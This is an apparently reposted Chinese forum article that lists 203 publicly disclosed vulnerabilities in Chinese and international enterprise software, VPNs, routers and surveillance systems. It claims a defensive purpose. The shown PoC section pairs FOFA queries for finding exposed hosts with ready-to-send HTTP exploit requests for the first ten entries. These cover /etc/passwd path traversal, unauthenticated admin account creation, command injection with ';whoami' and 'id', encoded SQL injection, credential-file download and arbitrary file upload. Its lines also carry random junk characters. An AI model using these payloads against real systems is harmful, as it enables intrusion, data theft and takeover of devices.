找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 480|回复: 0

互联网公开漏洞整理202309-202406--转载

[复制链接]
发表于 2024-6-5 14:31:29 | 显示全部楼层 |阅读模式
互联网公开漏洞整理202309-2024064 c% O/ B& y! [9 x
道一安全 2024-06-05 07:41 北京
/ F& n5 M( _, Z$ H- N6 n以下文章来源于网络安全新视界 ,作者网络安全新视界
7 H$ q# C! L: ~$ l' g8 Z+ `! w- l1 [# o
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。6 r' l/ J3 V% r, J
: s. e- R6 _: B1 _" @
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
) p! p5 n9 x3 |3 t9 O' d5 j  s
% _, N/ Y, ?3 G& I0 Y3 L安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。+ T- k$ w+ u5 \. x- ?9 W7 w
) a' y: o. O4 ?8 L
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
1 n% M: c, l/ S" x: e$ P, e. U' R' z: w& o5 s' R- r  ~2 n; v
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。0 }3 N. H! W0 L
  U# B8 C* O2 f' e" f: g
% |. m+ z# K3 _6 ^! h5 D+ M3 e9 h
声明% Q& V$ P, |: ^3 p' R; m- I5 q

, t# u4 M$ s" d) N, k% R为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
- K6 K* q$ k# Z
. t7 D* ]% ]1 }有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
4 C0 q, {& Q, l! C
; e$ H2 C8 y- _  _6 ^
. z6 y, b' |; G3 a, J1 }1 d# G- `" _3 S% C: R( f& x
目录
# [! s# M, ], {! g: W4 P# b0 T3 A1 Y# }
01  B- y: Y" u4 Y3 Z- i, g% k

# w9 d. v& t% M1 p- c2 Y1. StarRocks MPP数据库未授权访问3 {7 q) s9 O( ]* q4 O
2. Casdoor系统static任意文件读取) B. }5 ^# X. f) n
3. EasyCVR智能边缘网关 userlist 信息泄漏
$ Q1 ?6 m/ m5 \  s2 u4 o4. EasyCVR视频管理平台存在任意用户添加
6 ]/ |$ v8 t: I5 `& b) m$ @. B5. NUUO NVR 视频存储管理设备远程命令执行  z# |" f' b+ b5 v9 Y/ \2 G, L
6. 深信服 NGAF 任意文件读取+ g: E$ t' O3 F; ^) i7 N& L  q  }4 A. p
7. 鸿运主动安全监控云平台任意文件下载
8 I- ?" Q) H; {+ r$ u2 i) J" N8. 斐讯 Phicomm 路由器RCE7 H+ C5 |7 G4 [' z+ M# s7 O
9. 稻壳CMS keyword 未授权SQL注入
9 ~! z) _$ |8 m: ], w* I3 q& i) {10. 蓝凌EIS智慧协同平台api.aspx任意文件上传5 Q  N& S% |7 I* Y
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
- F9 g2 R6 c$ q, h* }. D12. Jorani < 1.0.2 远程命令执行% K. J9 W/ s# h
13. 红帆iOffice ioFileDown任意文件读取
4 D: v/ b4 U- q1 I$ S' d14. 华夏ERP(jshERP)敏感信息泄露
  ?: z) H- W5 Q15. 华夏ERP getAllList信息泄露
% x; ^1 j$ {+ x! c- S16. 红帆HFOffice医微云SQL注入3 w. V$ n! G1 P8 T
17. 大华 DSS itcBulletin SQL 注入6 q& a5 u: x+ z) d6 b
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
8 e9 d) K8 N+ K8 A3 p19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入& {& ^( q1 i, p1 l
20. 大华ICC智能物联综合管理平台任意文件读取
$ h9 m! K' y, S+ X6 t! y21. 大华ICC智能物联综合管理平台random远程代码执行
4 }7 Y/ Q- f, D& y( b4 g22. 大华ICC智能物联综合管理平台 log4j远程代码执行' Q3 Z- o# `2 O$ H, x
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
2 `3 N- X1 M8 F9 a24. 用友NC 6.5 accept.jsp任意文件上传5 G, N3 r1 d/ P* }2 K: r
25. 用友NC registerServlet JNDI 远程代码执行8 X# F2 H3 L! o5 _
26. 用友NC linkVoucher SQL注入
8 \" K$ K% S, p' d: e; B* L! v8 _27. 用友 NC showcontent SQL注入- d5 Y' K) m* \, {0 Q, ]) P' w5 z# c
28. 用友NC grouptemplet 任意文件上传
  p8 n- |' Y1 a! K+ Y. J4 B# q29. 用友NC down/bill SQL注入( W# k( A) s+ A. p
30. 用友NC importPml SQL注入
# P1 I* T0 C6 R3 D- ?& [' f# d31. 用友NC runStateServlet SQL注入
  G" R; K& M% S4 F* d32. 用友NC complainbilldetail SQL注入
/ [( j6 P/ i1 ?) x33. 用友NC downTax/download SQL注入% s5 P& K8 S3 s9 g1 t% O! J
34. 用友NC warningDetailInfo接口SQL注入
+ d/ W5 o' h/ F35. 用友NC-Cloud importhttpscer任意文件上传
. R, H0 b9 ]9 l  F, C" e$ _( A36. 用友NC-Cloud soapFormat XXE
3 @7 O% Q& l) J" s! `$ [4 d) D6 N& {37. 用友NC-Cloud IUpdateService XXE7 A% U+ T$ y1 Q8 L7 _- C0 T/ H" p
38. 用友U8 Cloud smartweb2.RPC.d XXE1 q+ H" V0 S; V) N" U
39. 用友U8 Cloud RegisterServlet SQL注入
0 M/ D( }9 n3 f& U40. 用友U8-Cloud XChangeServlet XXE2 T# I) N) e" D, _( x
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入; V. I% p& W( J
42. 用友GRP-U8 SmartUpload01 文件上传4 O; S7 W7 Q  D  V
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
* ?" [* f5 _' j/ p4 b; |- P) @44. 用友GRP-U8 bx_dj_check.jsp SQL注入
" p. c; V9 x9 ]/ ?* d# Z& ?" @45. 用友GRP-U8 ufgovbank XXE
( w) p. H+ z4 W0 d" K46. 用友GRP-U8 sqcxIndex.jsp SQL注入
5 ?+ H0 S/ b7 Y8 ]8 b) d47. 用友GRP A++Cloud 政府财务云 任意文件读取
$ r  e. w+ L5 f$ ]* ~48. 用友U8 CRM swfupload 任意文件上传
5 h0 n" l, o7 j: }6 Y49. 用友U8 CRM系统uploadfile.php接口任意文件上传
+ M+ `9 t1 P) `50. QDocs Smart School 6.4.1 filterRecords SQL注入, U" m# ?3 c( j+ m' d
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入" `# S$ L2 r  ^  r( i. E% n9 n
52. 泛微E-Office json_common.php sql注入" O- P5 j# U% ~4 I1 |
53. 迪普 DPTech VPN Service 任意文件上传6 f( W5 x. O, r. @0 a5 Z. S! x
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
* K3 V7 v+ J  G4 d55. 畅捷通T+ getdecallusers信息泄露
/ T& M$ r/ i1 N- t56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE8 t$ x7 p0 a$ R8 G: I
57. 畅捷通T+ keyEdit.aspx SQL注入! B! B* @4 B/ {1 K
58. 畅捷通T+ KeyInfoList.aspx sql注入
1 Q* R% H5 z' J! B2 J  d% }59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行: {3 ?) i" _* f( ~6 g1 ?
60. 百卓Smart管理平台 importexport.php SQL注入# ]' e0 \& i" k& E
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传3 H; M8 y5 _5 ^1 m
62. IP-guard WebServer 远程命令执行
( h3 `5 g7 h  R) p' D8 r8 N63. IP-guard WebServer任意文件读取
; t$ W, H) u- m, r. [5 }$ E64. 捷诚管理信息系统CWSFinanceCommon SQL注入- E* k* o% C: {2 D
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过- n, J  U4 `! L( \7 g7 I6 m1 _
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入. w9 R, P2 \- p! j) G4 g/ d* i
67. 万户ezOFFICE wpsservlet任意文件上传, G& z6 |- K1 {! N
68. 万户ezOFFICE wf_printnum.jsp SQL注入
6 T/ C. f" s' u3 v69. 万户 ezOFFICE contract_gd.jsp SQL注入& _) G' D- S( m# N* J3 l+ M
70. 万户ezEIP success 命令执行2 m/ }/ o$ [) m8 a5 D: ~
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
5 O$ `" u: w( q/ J, I72. 致远OA getAjaxDataServlet XXE' \1 b) {# e- ~/ [4 V  Y, j
73. GeoServer wms远程代码执行
8 z4 M, z: j  p+ y. n74. 致远M3-server 6_1sp1 反序列化RCE/ Q2 ^# l1 O4 |
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
  I) ]: E, b' O76. 新开普掌上校园服务管理平台service.action远程命令执行# L. O, i+ G# \% q& C. h8 N- C
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
! f! q1 l$ m) P* f6 H* R0 U( I78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
; X7 c( B; K+ F5 ~. v79. BYTEVALUE 百为流控路由器远程命令执行
* D/ d+ U! C- J- M80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传5 ]6 M- D7 n0 ]
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露8 ^- @# a$ l' n2 Z: ^) L; J/ Y9 T
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
3 K9 }) g/ [- ~83. JeecgBoot testConnection 远程命令执行
! D0 L/ }$ ~6 f; T' @84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
- G4 O( [/ x. r" h- g85. SysAid On-premise< 23.3.36远程代码执行$ T" Y1 o0 a8 Z9 T  B) W- t) x# N
86. 日本tosei自助洗衣机RCE
4 M# ?. G3 O+ n87. 安恒明御安全网关aaa_local_web_preview文件上传5 |; G$ ?. s8 I4 `
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行% C& i. E  V9 Z3 d3 A/ n
89. 致远互联FE协作办公平台editflow_manager存在sql注入( p% m% ?1 f) [# N0 k6 p2 C
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行9 ?' y- @& t3 u, j
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
" e0 z# ~1 F- o' z" l) D) D92. 海康威视运行管理中心session命令执行
6 A- ~* ~! t4 d( S* |: e0 q5 h93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传. m( v) h* T; s8 S/ x
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传7 g- z3 c' U6 x1 C; s. p9 p
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
7 D  Y1 V  X1 \, w96. Apache OFBiz  18.12.11 groovy 远程代码执行
# V" l6 w9 X* T4 n  c% Y97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行0 k- I7 V# S5 y8 M6 Q- {+ @
98. SpiderFlow爬虫平台远程命令执行
1 i$ z7 f, h! q6 O( [. h99. Ncast盈可视高清智能录播系统busiFacade RCE
4 `6 ]( E- T, W100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
" x" T. q. b" U. p101. ivanti policy secure-22.6命令注入( \1 F+ t! }" y* s
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行, N- @. S# K! P5 x" C' q; X
103. Ivanti Pulse Connect Secure VPN XXE
' {; O: u6 n4 H. g5 }. r104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
* {( X: P+ M" G- H% Y( u& r105. SpringBlade v3.2.0 export-user SQL 注入& s, l9 `& j' g# F2 H3 U
106. SpringBlade dict-biz/list SQL 注入4 C& r6 j/ F. j; l; E
107. SpringBlade tenant/list SQL 注入0 d' u* Z5 s$ l
108. D-Tale 3.9.0 SSRF
9 n) s/ \2 o/ L; M109. Jenkins CLI 任意文件读取4 u. l. |1 Y# P% F* X8 e
110. Goanywhere MFT 未授权创建管理员
) C0 T2 g/ [7 a* [! @# `8 P" z. W111. WordPress Plugin HTML5 Video Player SQL注入3 J. s5 F5 K  ^- h8 W8 v& t# A( Z
112. WordPress Plugin NotificationX SQL 注入
- B' `6 q4 b/ |, _# N9 n) T+ g113. WordPress Automatic 插件任意文件下载和SSRF
0 F% J, O! O3 M114. WordPress MasterStudy LMS插件 SQL注入/ m2 U+ L; I* e( X; i/ J, S
115. WordPress Bricks Builder <= 1.9.6 RCE& h- j) ^! Q/ v+ K
116. wordpress js-support-ticket文件上传& C% M9 }* D' i5 G; E5 @+ F3 F1 P
117. WordPress LayerSlider插件SQL注入
9 M( a0 }; V8 B, I118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
/ o5 \- l+ E0 z8 J; J  S  }' l4 D' @8 x119. 北京百绰智能S20后台sysmanageajax.php sql注入
7 f! T3 ?: Z0 V5 z5 p8 n120. 北京百绰智能S40管理平台导入web.php任意文件上传
" S! J  {0 S/ D0 X  Q' Q; k121. 北京百绰智能S42管理平台userattestation.php任意文件上传  r/ v  I: f  Y7 d
122. 北京百绰智能s200管理平台/importexport.php sql注入8 |2 m2 B6 y  o) G6 v8 O1 |
123. Atlassian Confluence 模板注入代码执行7 [/ Q% ~1 Z* ~* S+ r8 v1 u. d
124. 湖南建研工程质量检测系统任意文件上传7 A, g. x6 [+ p/ L) K
125. ConnectWise ScreenConnect身份验证绕过- _+ J/ M. u, ^7 ^& r; R: A5 r
126. Aiohttp 路径遍历3 N* }" j7 \$ U6 O. a7 z" F
127. 广联达Linkworks DataExchange.ashx XXE: a) \' \* G1 M
128. Adobe ColdFusion 反序列化
: o' _: k) v6 p5 H* H3 R129. Adobe ColdFusion 任意文件读取5 k. H; {0 x3 r# K' Q" `
130. Laykefu客服系统任意文件上传
: U2 K# l+ v' g. ?131. Mini-Tmall <=20231017 SQL注入$ L6 D7 w8 A" [: h/ g! M
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
1 ], s; Y! }: L; M2 ~% ?* `/ }7 h* u133. H5 云商城 file.php 文件上传
2 F/ o, u2 i& o: ~2 e* e: q134. 网康NS-ASG应用安全网关index.php sql注入
" }2 `) D) _& o! J. }. l1 W135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
/ L" f0 U: t! N3 X136. NextChat cors SSRF( j/ s- \5 i+ i9 s$ l9 D9 ?) ]
137. 福建科立迅通信指挥调度平台down_file.php sql注入
* [3 i& g: Z% c138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
( U1 g) P6 c9 |139. 福建科立讯通信指挥调度平台editemedia.php sql注入7 ^" h! o" d7 W0 }" @
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入: {. m# ]* Q0 A8 q% C. @8 l
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
2 K* @6 ]  V! F0 _* J$ ?142. CMSV6车辆监控平台系统中存在弱密码
8 g. k& m, ~7 S  D3 O143. Netis WF2780 v2.1.40144 远程命令执行
7 o, w% V% J; `4 D. |# J# Q144. D-Link nas_sharing.cgi 命令注入1 M4 S: c' m7 ~: R
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入, V4 ^3 J3 h: l$ F( {' O/ [
146. MajorDoMo thumb.php 未授权远程代码执行. s6 X! ?1 E& t8 B5 D4 t: C+ w! v" W
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历. {8 g. v0 C" w
148. CrushFTP 认证绕过模板注入* ]2 J' {) \( g) o
149. AJ-Report开源数据大屏存在远程命令执行
2 v: F  z7 v. M150. AJ-Report 1.4.0 认证绕过与远程代码执行4 z% V  g, |0 b7 Q6 W& Z; w  w
151. AJ-Report 1.4.1 pageList sql注入2 n+ K+ `1 H- W" k
152. Progress Kemp LoadMaster 远程命令执行- F0 A; o$ s: |% D" l
153. gradio任意文件读取* v4 J: E3 A$ u' `$ F3 v" Y
154. 天维尔消防救援作战调度平台 SQL注入8 t: i! |( R! P5 t6 f
155. 六零导航页 file.php 任意文件上传
5 f! S; u4 ^* q/ T, }156. TBK DVR-4104/DVR-4216 操作系统命令注入- z) G' x% ?" C& r, `' g; q
157. 美特CRM upload.jsp 任意文件上传
' c; M3 t" {  k+ `4 y7 _' C/ `158. Mura-CMS-processAsyncObject存在SQL注入
# z7 L" y) T  k159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传0 U9 p& w: |- b  t; F5 o' _
160. Sonatype Nexus Repository 3目录遍历与文件读取
2 v2 T: N" l, V- z( D& O161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传4 W* p1 q" c# r. z6 V* O# S
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
# ?) h. F' q, h& W; S9 P  q163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
; S1 l' P2 ]% y5 @+ g/ q164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
1 X/ T# c& L% ~' \* H1 n165. OrangeHRM 3.3.3 SQL 注入
# {: c1 r; P' a5 f2 G1 b166. 中成科信票务管理平台SeatMapHandler SQL注入
  {; Z6 A( g% L7 j% H+ _$ X! a167. 精益价值管理系统 DownLoad.aspx任意文件读取. B6 p* |/ D$ x2 o, T
168. 宏景EHR OutputCode 任意文件读取3 L& j% r; Y; Q9 `
169. 宏景EHR downlawbase SQL注入
  r% C) u; W6 D. ]9 I% W170. 宏景EHR DisplayExcelCustomReport 任意文件读取2 m: n" Z: c; w) |" [7 ~
171. 通天星CMSV6车载定位监控平台 SQL注入* `% A. Z) v" ~& u- B: F/ N
172. DT-高清车牌识别摄像机任意文件读取
5 Y6 M; `' h! }& E9 M2 B% |173. Check Point 安全网关任意文件读取
  i: L4 ^( q4 H6 y) n4 \174. 金和OA C6 FileDownLoad.aspx 任意文件读取9 k( M" q& K6 r: Q( X' `
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
2 i& g$ `- @- V176. 电信网关配置管理系统 rewrite.php 文件上传
9 D" _3 {4 A) e) P177. H3C路由器敏感信息泄露
" _( d& _! K: p7 P# Z178. H3C校园网自助服务系统-flexfileupload-任意文件上传
3 _" t1 R2 K* S  N179. 建文工程管理系统存在任意文件读取8 Q6 W9 a. X, w4 b) s% Y, f
180. 帮管客 CRM jiliyu SQL注入
: |! H# ^: W8 [' l& L4 u1 [. I# F- h( h, P181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入% ?' H! ^" a; \, r) A4 E
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建# V! Z' n7 f2 D( f& R2 G
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
; u5 p! S4 W, d$ q% r- _# N184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加. j: d# A! E/ h8 w( h# |
185. 瑞友天翼应用虚拟化系统SQL注入
# M! u3 J& ?* T2 Q! i186. F-logic DataCube3 SQL注入& J* Q9 g4 }+ q+ C
187. Mura CMS processAsyncObject SQL注入
" D9 I$ Z7 t0 v& c, q188. 叁体-佳会视频会议 attachment 任意文件读取2 `' X% P3 l/ D3 F% B
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
. P2 R( j* L" g. U" I9 I190. 短视频矩阵营销系统 poihuoqu 任意文件读取
5 j0 r( u0 ], i5 J- R191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入: \- _5 Z' G' d. N5 j! w; |
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传8 x3 R9 \+ [# F' V) t) \
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
+ p2 G! m1 a8 A7 K5 ^. S194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传: g  R+ ?( q8 J/ z3 l
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
% C9 S) o. x* B6 e: U196. 河南省风速科技统一认证平台密码重置
; L$ v7 W; S. J+ g197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
) }1 m2 Q! b' {6 c8 l198.  阿里云盘 WebDAV 命令注入, `/ `8 @# m3 U
199. cockpit系统assetsmanager_upload接口 文件上传
1 T: e4 z5 @) v, e3 g" A) ]200. SeaCMS海洋影视管理系统dmku SQL注入  v' p& v: `3 v
201. 方正全媒体新闻采编系统 binary SQL注入. z, _9 U! ~4 S
202. 微擎系统 AccountEdit任意文件上传4 |) E/ x) `7 [7 M* s0 e
203. 红海云EHR PtFjk 文件上传
, g. t$ a5 i+ |/ P0 U3 n3 J# S
# \/ O1 Q# }& c! Y- o) e6 uPOC列表
. [4 G1 V! `6 ~, g/ N: F  \- ]2 Q$ y9 z9 |
02
  X, b7 N9 z$ q5 g) ^
& ]7 o3 v. M. h1. StarRocks MPP数据库未授权访问
2 e' _; {+ [. W; ?FOFA :title="StarRocks"
/ U8 \- W% \# _. [* E0 S+ mGET /mem_tracker HTTP/1.1+ ]8 k) B& Y# M
Host: URL4 {9 V- _) M) N6 W* C- _5 T3 c
* m" x# T9 C! Y+ B' \
. N3 j$ u& s* v- e5 s
2. Casdoor系统static任意文件读取
# \) A5 r  m2 P" e7 QFOFA :title="Casdoor"8 {; f' e' q. N+ M+ ?+ M) X
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1# O: j0 ?  I' l/ [
Host: xx.xx.xx.xx:9999/ }& h7 d# g( j8 w3 B% A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: y- W' M( i$ w# _
Connection: close
8 e  q( Q# e2 S) w2 {Accept: */*- L1 G' l) A+ n
Accept-Language: en
7 C$ J. _. {) l8 z$ ~$ x( V! NAccept-Encoding: gzip4 q+ q6 [6 _- h0 U1 r
  H* |6 [- |) Q/ A: [7 J1 o

  V: ~3 W, N$ i% x& ]3. EasyCVR智能边缘网关 userlist 信息泄漏) r0 }5 u! q$ ]3 Q4 W& V2 {8 {
FOFA :title="EasyCVR"9 E% O; o) ~# i; l! N7 I
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
; a: m' R/ \/ s8 Z- o7 kHost: xx.xx.xx.xx! v( Z7 g# W8 i7 T$ W7 h* v- j+ o8 j
5 q2 j6 l" I1 O2 x3 v/ ^0 m( N
5 l2 b* T& z3 z* o
4. EasyCVR视频管理平台存在任意用户添加% V* N/ m9 ?# }2 m
FOFA :title="EasyCVR"/ N' S  ~. a1 t5 [
+ a' U. W2 Y8 ?( l' @2 G6 R, X
password更改为自己的密码md53 s7 @8 S. G! y2 q% \2 T: E
POST /api/v1/adduser HTTP/1.17 u5 r5 @# ~" Y# [
Host: your-ip
; L# K' G* L1 N/ h9 ^Content-Type: application/x-www-form-urlencoded; charset=UTF-8& D% H0 k3 @" k7 o& f: D. O
; ]0 T* Z; T; |8 ~4 P
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1( N/ J8 n# a/ ]- s& h& Q/ y" _
$ k5 v4 s' p& y

9 f- r9 O/ u8 d5 U- Z$ O  o5. NUUO NVR 视频存储管理设备远程命令执行! E$ g& Z8 A4 S  N- f; W6 ?
FOFA:title="Network Video Recorder Login"
& z3 F9 s. V) C3 d7 nGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
/ F* K4 I4 _+ ^' D! D% c# y, oHost: xx.xx.xx.xx! c( f9 B6 A) i' ~6 Q4 y+ G/ z& N8 z
+ @8 \9 n: ~0 V  ]( x6 L: w

7 Z5 u% G/ ^1 Q1 o" A$ G& B6. 深信服 NGAF 任意文件读取/ |" I6 i+ z/ V8 M, l8 g
FOFA:title="SANGFOR | NGAF"
9 f4 T# {+ K' k# h; i4 |GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
7 P: t. l$ U) O- ZHost:$ r* c: {' u' w, \

1 H1 i% g8 H1 E  G" \
3 O. P; h$ }$ ~% t' M0 o7. 鸿运主动安全监控云平台任意文件下载
$ _8 h2 Q9 t) O; l) U$ I% MFOFA:body="./open/webApi.html"
4 `4 @! E5 N# b7 T: mGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.11 x0 j/ H8 }! q  S) |* `
Host:$ \4 {3 L9 u) T1 ]1 [/ i

. `2 s, q9 s5 [5 w! k% W) g' l0 n/ I) D- P8 L% x
8. 斐讯 Phicomm 路由器RCE
7 M4 z6 N- X8 C* _5 q/ C# J, SFOFA:icon_hash="-1344736688"
: t; o2 ]* T9 a5 y0 R; |& Z默认账号admin登录后台后,执行操作
& B% M! i- p* }+ I# k; e. tPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1: M4 m9 _; T4 }7 r" A3 @
Host: x.x.x.x
& b9 j! Y' J9 d8 L7 LCookie: sysauth=第一步登录获取的cookie* u3 E& G! A+ {* ?: r8 j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
, D+ B- z+ ~, k9 |! XUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36; F& ?3 M0 ]1 w5 Y/ b" O
$ Q  M; O4 I9 Z( D8 G
------WebKitFormBoundaryxbgjoytz7 n) `. d- v4 `" s  w
Content-Disposition: form-data; name="wifiRebootEnablestatus"
  J7 ^1 w, Z4 _0 E, l/ O
- M2 a: v% ~7 v%s
8 ]- `, q# ~- a) x6 ]( k4 e: K------WebKitFormBoundaryxbgjoytz
3 I7 |4 @7 V6 H2 s' c( |2 iContent-Disposition: form-data; name="wifiRebootrange") p! F6 Z& ?& @; u& [

& D! V; R$ Z) a/ s12:00; id;
  E) p8 }7 D6 u5 A. C7 [/ N------WebKitFormBoundaryxbgjoytz
, `; |2 q5 j7 X+ d; xContent-Disposition: form-data; name="wifiRebootendrange"
% p  z" n) a  i: w/ t
/ \$ ?5 e1 u! \0 F1 Y%s:
! i4 H8 t+ B8 z) n$ V: k( ?3 N+ j------WebKitFormBoundaryxbgjoytz
$ n" O' h2 U$ Q6 p! z3 |' \Content-Disposition: form-data; name="cururl2"
8 a2 D3 t5 A" K8 |0 r! i, |/ P# Z- i1 D2 K  m4 j& b

$ v2 ?2 Z7 ^; e! D------WebKitFormBoundaryxbgjoytz--
8 X" T$ B: q# p9 ?7 w+ p9 h1 E& w% Q6 k* [' P  _6 K; d8 b

) X4 W  t1 h8 u' \9. 稻壳CMS keyword 未授权SQL注入
+ [; G  \9 R) u3 Y; Z8 s7 X9 x2 S: \: VFOFA:app="Doccms"
" D* n3 ^4 E$ |- n7 }3 L6 kGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
# _- E' k$ l( z$ \Host: x.x.x.x& `( D+ G. }2 \; Z& ~, `
' @2 t/ q$ E- ]5 V8 T
+ l0 \! }# p' @% m7 ~; ]- i
payload为下列语句的二次Url编码
4 G2 [- A. u1 u  D% `. _
$ m) `+ ]. ~$ h+ U- o" s' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#; |' i3 {5 w! a, H! O
1 i3 y* ~/ P  O- y( i$ s9 {' m4 @
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传% T' }0 c( y' b: v; U$ x
FOFA:icon_hash="953405444", g1 w0 R5 M8 k2 r% X

9 }" i* R, S7 c8 Y+ P: e文件上传后响应中包含上传文件的路径
: C4 L) {/ L3 }# h& CPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
# i$ c! r! ]+ ~# l! ^' k! N( T% x. k" @Host: x.x.x.x:xx  [/ u! j. y3 h+ h" j: C( r, q; {7 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
/ B3 r, B2 d! j( OContent-Length: 197* A  W) M/ I; ?( {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9, N, V% k2 y3 u8 R6 D4 ?
Accept-Encoding: gzip, deflate7 a: W* |$ }% G  @6 }/ L
Accept-Language: zh-CN,zh;q=0.9% d- V, z2 _' c# E0 P* h# H+ I
Connection: close* W7 m. E1 T* W+ O9 }
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
6 l2 D8 m1 ~, _  \; D
: p4 e2 E; q' ?2 w' n------WebKitFormBoundaryxdgaqmqu
% y) }% l- r: ^; _0 c" SContent-Disposition: form-data; name="file"filename="icfitnya.txt"% Y1 X6 }2 t5 P4 G
Content-Type: text/html
: m( }7 P/ R& B% X/ r/ v2 a+ i6 @/ K, n6 H$ W) U! [3 y
jmnqjfdsupxgfidopeixbgsxbf
  H( y* D, ?  ^8 t" r$ b------WebKitFormBoundaryxdgaqmqu--
# k$ x8 ^& V* Y( @$ h) j
5 S6 c8 V' K( G! t
